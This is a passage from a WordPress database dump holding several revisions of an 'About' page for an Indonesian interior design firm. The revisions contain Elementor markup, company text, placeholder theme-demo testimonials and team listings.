src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:32:38','2023-09-22 08:32:38','',38,'https://bauhaus.futuremediatrix.com/?p=4843',0,'revision','',0),(4844,3,'2023-09-22 08:32:38','2023-09-22 08:32:38','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:32:38','2023-09-22 08:32:38','',38,'https://bauhaus.futuremediatrix.com/?p=4844',0,'revision','',0),(4845,3,'2023-09-22 08:32:38','2023-09-22 08:32:38','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								\"Let\'s turn your ideas into reality\"							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:32:38','2023-09-22 08:32:38','',38,'https://bauhaus.futuremediatrix.com/?p=4845',0,'revision','',0),(4846,3,'2023-09-22 08:33:43','2023-09-22 08:33:43','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								\"Let\'s turn your ideas into reality\"							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class 